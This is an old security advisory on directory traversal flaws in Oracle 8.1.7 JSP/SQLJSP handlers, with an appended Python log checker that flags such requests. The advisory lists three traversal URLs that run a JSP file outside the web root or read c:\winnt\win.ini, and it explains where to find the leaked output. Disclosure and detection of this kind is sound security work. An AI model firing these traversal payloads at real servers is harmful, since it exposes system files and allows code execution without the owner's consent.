Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root

Georgi Guninski security advisory #36, 2001

Systems affected:
Oracle JSP/SQLJSP handlers, installed by default with Oracle 8.1.7 on Windows 2000. I have not tested other versions, but they may be vulnerable.

Risk: High
Date: 22 January 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or  indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.
 

Description:
It is possible to view files outside the web root.
It is also possible to execute .JSP files outside the web root, on the same partition as
the web server's root.
 

Details:
I guess there are at least 2 vulnerabilities with JSP/SQLJSP handlers.
Basically these are directory traversal vulnerabilities.
1) The following URL:
---------------------------------------
http://oraclehost/servlet//..//../o.jsp
---------------------------------------
will execute c:\o.jsp if such a file exists.
As a side effect, this shall create the directory C:\servlet\_pages\_servlet and put
the Java source and .class file of o.jsp in it.

2) The following URL:
-------------------------------------------------------------
http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini
-------------------------------------------------------------
shall read c:\winnt\win.ini. It is normal to receive an error in response to this request. To see the result,
go to http://oraclehost/_pages and look in the directories for .java files containing "win".

3) The following URL:
-----------------------------------------------------------------
http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
-----------------------------------------------------------------
shall read c:\winnt\win.ini. It is normal to receive an error in response to this request. To see the result,
go to http://oraclehost/_pages and look in the directories for .java files containing "win".

Note: all URLs were tested with Netscape 4.76 or direct HTTP requests. They do not work with IE.
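
A log check for the request shapes listed above, as an added example that is not part of the original advisory: it resolves each request path the way a filesystem does (empty segments from `//` collapsed) and flags any path that climbs above the web root. The log lines are constructed and the function names are illustrative; the advisory does not say why the handlers accept these paths, and the `collapse_empty=False` mode only shows that a check treating `//` as a real directory would miss all three URLs.

```python
from urllib.parse import unquote

def min_depth(path, collapse_empty=True):
    """Lowest directory depth reached while resolving path from the web root.

    A negative value means the path climbs above the web root.
    """
    # Drop the query string, decode once, and treat "\" like "/" (Windows host).
    decoded = unquote(path.split("?", 1)[0]).replace("\\", "/")
    depth = lowest = 0
    for seg in decoded.lstrip("/").split("/"):
        if seg == "." or (seg == "" and collapse_empty):
            continue                      # no change of directory
        depth += -1 if seg == ".." else 1
        lowest = min(lowest, depth)
    return lowest

def flag_escapes(log_lines):
    """Return the request paths in access-log lines that leave the web root."""
    hits = []
    for line in log_lines:
        try:
            path = line.split('"')[1].split()[1]   # "GET /path HTTP/1.0"
        except IndexError:
            continue                               # malformed line, skip it
        if min_depth(path) < 0:
            hits.append(path)
    return hits

# Constructed log lines; the three flagged paths are the URLs from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2001:10:00:01 +0000] "GET /index.jsp HTTP/1.0" 200 512',
    '192.0.2.10 - - [22/Jan/2001:10:00:02 +0000] "GET /docs/../index.jsp HTTP/1.0" 200 512',
    '192.0.2.66 - - [22/Jan/2001:10:03:10 +0000] "GET /servlet//..//../o.jsp HTTP/1.0" 200 90',
    '192.0.2.66 - - [22/Jan/2001:10:03:12 +0000] '
    '"GET /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0" 500 310',
    '192.0.2.66 - - [22/Jan/2001:10:03:15 +0000] '
    '"GET /bb.sqljsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0" 500 310',
]

if __name__ == "__main__":
    for p in flag_escapes(SAMPLE_LOG):
        # path, depth with "//" collapsed, depth with "//" counted as a directory
        print(p, min_depth(p), min_depth(p, collapse_empty=False))
```
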
 

Vendor status:
Oracle was contacted on 18 January 2001.

Regards,
Georgi Guninski
http://www.guninski.com


 
 
